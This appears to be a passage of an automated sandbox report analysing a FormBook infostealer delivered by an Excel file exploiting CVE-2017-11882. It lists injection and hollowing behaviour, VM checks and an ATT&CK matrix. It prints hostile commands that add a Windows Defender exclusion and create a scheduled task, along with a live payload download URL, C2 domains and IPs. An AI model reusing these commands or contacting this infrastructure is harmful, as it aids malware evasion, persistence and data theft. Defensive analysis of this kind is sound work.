Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: vbc.exe, 00000004.00000002.463429228.00000000022CD000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 0000000A.00000000.466037172.0000000000255000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.484397253.000000000457A000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: vbc.exe, 00000004.00000002.463429228.00000000022CD000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.463429228.00000000022CD000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 0000000A.00000000.479423416.00000000083DA000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0s
Source: explorer.exe, 0000000A.00000000.484397253.000000000457A000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.469562916.000000000577D000.00000004.00000001.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 0000000A.00000000.506224485.00000000044E7000.00000004.00000001.sdmp	Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: explorer.exe, 0000000A.00000000.479423416.00000000083DA000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000^
Source: explorer.exe, 0000000A.00000000.481002565.000000000029B000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 0000000A.00000000.470628485.00000000045D6000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.484397253.000000000457A000.00000004.00000001.sdmp	Binary or memory string: idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________
Source: vbc.exe, 00000004.00000002.463429228.00000000022CD000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 9_2_00C626F8 mov eax, dword ptr fs:[00000030h]		9_2_00C626F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 12_2_00A426F8 mov eax, dword ptr fs:[00000030h]		12_2_00A426F8

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 9_2_004088D0 rdtsc

9_2_004088D0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 9_2_00409B40 LdrLoadDll,

9_2_00409B40

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.digipoint-entertainment.com
Source: C:\Windows\explorer.exe	Domain query: www.hacticum.com
Source: C:\Windows\explorer.exe	Network Connect: 108.167.189.66 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.0.78.25 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.trashwasher.com
Source: C:\Windows\explorer.exe	Domain query: www.noyoucantridemyonewheel.com
Source: C:\Windows\explorer.exe	Domain query: www.franquiciasexclusivas.tienda
Source: C:\Windows\explorer.exe	Network Connect: 151.106.119.46 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.deboraverdian.com
Source: C:\Windows\explorer.exe	Network Connect: 151.101.66.159 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Adds a directory exclusion to Windows Defender

Show sources

Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nLOlOTZpUHFzC.exe
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nLOlOTZpUHFzC.exe			Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: A00000

Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1764			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread register set: target process: 1764			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nLOlOTZpUHFzC.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nLOlOTZpUHFzC" /XML "C:\Users\user\AppData\Local\Temp\tmp5580.tmp	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior

Source: explorer.exe, 0000000A.00000000.499985867.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.474384817.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.466242782.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.481212963.0000000000750000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.474173559.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.499784480.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.466037172.0000000000255000.00000004.00000020.sdmp	Binary or memory string: ProgmanG
Source: explorer.exe, 0000000A.00000000.499985867.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.474384817.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.466242782.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.481212963.0000000000750000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: explorer.exe, 0000000A.00000000.499985867.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.474384817.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.466242782.0000000000750000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.481212963.0000000000750000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter3	Scheduled Task/Job1	Process Injection612	Masquerading111	OS Credential Dumping	Security Software Discovery221	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job1	Boot or Logon Initialization Scripts	Scheduled Task/Job1	Disable or Modify Tools11	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer14	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Shared Modules1	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion31	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Exploitation for Client Execution13	Logon Script (Mac)	Logon Script (Mac)	Process Injection612	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol123	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information4	Cached Domain Credentials	File and Directory Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing13	DCSync	System Information Discovery113	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PROFORMA INVOICE.xlsx	31%	ReversingLabs	Document-OLE.Exploit.CVE-2017-11882

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
9.0.vbc.exe.400000.9.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
9.0.vbc.exe.400000.7.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
9.0.vbc.exe.400000.5.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
9.2.vbc.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
trashwasher.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://wellformedweb.org/CommentAPI/	0%	URL Reputation	safe
http://www.hacticum.com/ht08/?br2=NsDQ5dhzDoz6b+QTI369eNhdKzsm5WWXC1g1e1LkMaMU2QVIAgjIadv0XRSqFt55bwDZkw==&fDKD5Z=lbLdxBhXWNSHTR	0%	Avira URL Cloud	safe
http://107.173.229.133/90009/vbc.exe	0%	Avira URL Cloud	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.mozilla.com0	0%	URL Reputation	safe
www.septemberstockevent200.com/ht08/	0%	Avira URL Cloud	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://www.deboraverdian.com/ht08/?br2=hqaFuomov4HTN7lxwLOQI0L+zLU3A1JjC3kLHHHa91aVMp4VPmQJeUa+LGH249kypYugsQ==&fDKD5Z=lbLdxBhXWNSHTR	100%	Avira URL Cloud	malware
http://java.sun.com	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.franquiciasexclusivas.tienda/ht08/?br2=Wj4EIVjQBNu/bqqxJYrWPsWLHRdbpU/VGyAVKo6IxXme9nj69vNHjvuNthqXxUIvimxQ8w==&fDKD5Z=lbLdxBhXWNSHTR	0%	Avira URL Cloud	safe
http://www.trashwasher.com/ht08/?br2=uW1sPHtBOFcvSjOqiE7uYKY6CRw967TpF9DAp4EO6MgnVSdl1zAyFQ+ogdnPtirgP8DfTg==&fDKD5Z=lbLdxBhXWNSHTR	0%	Avira URL Cloud	safe
http://computername/printers/printername/.printer	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.noyoucantridemyonewheel.com/ht08/?br2=60BX3p/jKqTFfatzdk67FZjwUvooQvGFnODgWFokXaJ7H/RmjwYG/Htt7Nd+S+ztCPQGkw==&fDKD5Z=lbLdxBhXWNSHTR	0%	Avira URL Cloud	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
hacticum.com	34.102.136.180	true	false		unknown
trashwasher.com	151.101.66.159	true	true	0%, Virustotal, Browse	unknown
noyoucantridemyonewheel.com	192.0.78.25	true	true		unknown
www.franquiciasexclusivas.tienda	108.167.189.66	true	true		unknown
deboraverdian.com	151.106.119.46	true	true		unknown
www.trashwasher.com	unknown	unknown	true		unknown
www.noyoucantridemyonewheel.com	unknown	unknown	true		unknown
www.digipoint-entertainment.com	unknown	unknown	true		unknown
www.deboraverdian.com	unknown	unknown	true		unknown
www.hacticum.com	unknown	unknown	true		unknown
www.getjoyce.net	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.hacticum.com/ht08/?br2=NsDQ5dhzDoz6b+QTI369eNhdKzsm5WWXC1g1e1LkMaMU2QVIAgjIadv0XRSqFt55bwDZkw==&fDKD5Z=lbLdxBhXWNSHTR	false	Avira URL Cloud: safe	unknown
http://107.173.229.133/90009/vbc.exe	true	Avira URL Cloud: safe	unknown
www.septemberstockevent200.com/ht08/	true	Avira URL Cloud: safe	low
http://www.deboraverdian.com/ht08/?br2=hqaFuomov4HTN7lxwLOQI0L+zLU3A1JjC3kLHHHa91aVMp4VPmQJeUa+LGH249kypYugsQ==&fDKD5Z=lbLdxBhXWNSHTR	true	Avira URL Cloud: malware	unknown
http://www.franquiciasexclusivas.tienda/ht08/?br2=Wj4EIVjQBNu/bqqxJYrWPsWLHRdbpU/VGyAVKo6IxXme9nj69vNHjvuNthqXxUIvimxQ8w==&fDKD5Z=lbLdxBhXWNSHTR	true	Avira URL Cloud: safe	unknown
http://www.trashwasher.com/ht08/?br2=uW1sPHtBOFcvSjOqiE7uYKY6CRw967TpF9DAp4EO6MgnVSdl1zAyFQ+ogdnPtirgP8DfTg==&fDKD5Z=lbLdxBhXWNSHTR	true	Avira URL Cloud: safe	unknown
http://www.noyoucantridemyonewheel.com/ht08/?br2=60BX3p/jKqTFfatzdk67FZjwUvooQvGFnODgWFokXaJ7H/RmjwYG/Htt7Nd+S+ztCPQGkw==&fDKD5Z=lbLdxBhXWNSHTR	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.windows.com/pctv.	explorer.exe, 0000000A.00000000.475187176.0000000002AE0000.00000002.00020000.sdmp	false		high
http://investor.msn.com	explorer.exe, 0000000A.00000000.475187176.0000000002AE0000.00000002.00020000.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	explorer.exe, 0000000A.00000000.475187176.0000000002AE0000.00000002.00020000.sdmp	false		high
http://wellformedweb.org/CommentAPI/	explorer.exe, 0000000A.00000000.470694793.0000000004650000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.iis.fhg.de/audioPA	explorer.exe, 0000000A.00000000.470694793.0000000004650000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.mozilla.com0	explorer.exe, 0000000A.00000000.485622386.0000000006A09000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	explorer.exe, 0000000A.00000000.500985342.0000000002CC7000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.hotmail.com/oe	explorer.exe, 0000000A.00000000.475187176.0000000002AE0000.00000002.00020000.sdmp	false		high
http://treyresearch.net	explorer.exe, 0000000A.00000000.470694793.0000000004650000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	explorer.exe, 0000000A.00000000.500985342.0000000002CC7000.00000002.00020000.sdmp	false		high
http://java.sun.com	explorer.exe, 0000000A.00000000.474173559.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.499784480.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.466037172.0000000000255000.00000004.00000020.sdmp	false	URL Reputation: safe	unknown
http://www.icra.org/vocabulary/.	explorer.exe, 0000000A.00000000.500985342.0000000002CC7000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	vbc.exe, 00000004.00000002.466458025.0000000004D30000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.500073049.0000000001BE0000.00000002.00020000.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	explorer.exe, 0000000A.00000000.472240765.00000000083F6000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.476818163.000000000447A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.484143335.000000000447A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.506021303.000000000447A000.00000004.00000001.sdmp	false		high
http://investor.msn.com/	explorer.exe, 0000000A.00000000.475187176.0000000002AE0000.00000002.00020000.sdmp	false		high
http://www.piriform.com/ccleaner	explorer.exe, 0000000A.00000000.472240765.00000000083F6000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.476818163.000000000447A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.484209612.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.484143335.000000000447A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.476939391.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.506021303.000000000447A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.506224485.00000000044E7000.00000004.00000001.sdmp	false		high
http://computername/printers/printername/.printer	explorer.exe, 0000000A.00000000.470694793.0000000004650000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low
http://www.%s.comPA	vbc.exe, 00000004.00000002.466458025.0000000004D30000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.500073049.0000000001BE0000.00000002.00020000.sdmp, svchost.exe, 0000000C.00000002.661607475.00000000042B0000.00000002.00020000.sdmp	false	URL Reputation: safe	low
http://www.autoitscript.com/autoit3	explorer.exe, 0000000A.00000000.474173559.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.499784480.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.466037172.0000000000255000.00000004.00000020.sdmp	false		high
https://support.mozilla.org	explorer.exe, 0000000A.00000000.474173559.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.499784480.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.466037172.0000000000255000.00000004.00000020.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	vbc.exe, 00000004.00000002.463350952.000000000223F000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.463429228.00000000022CD000.00000004.00000001.sdmp	false		high
http://servername/isapibackend.dll	schtasks.exe, 00000007.00000002.457769626.0000000000830000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.476194780.0000000003E50000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
192.0.78.25	noyoucantridemyonewheel.com	United States	2635	AUTOMATTICUS	true
151.106.119.46	deboraverdian.com	Germany	61157	PLUSSERVER-ASN1DE	true
151.101.66.159	trashwasher.com	United States	54113	FASTLYUS	true
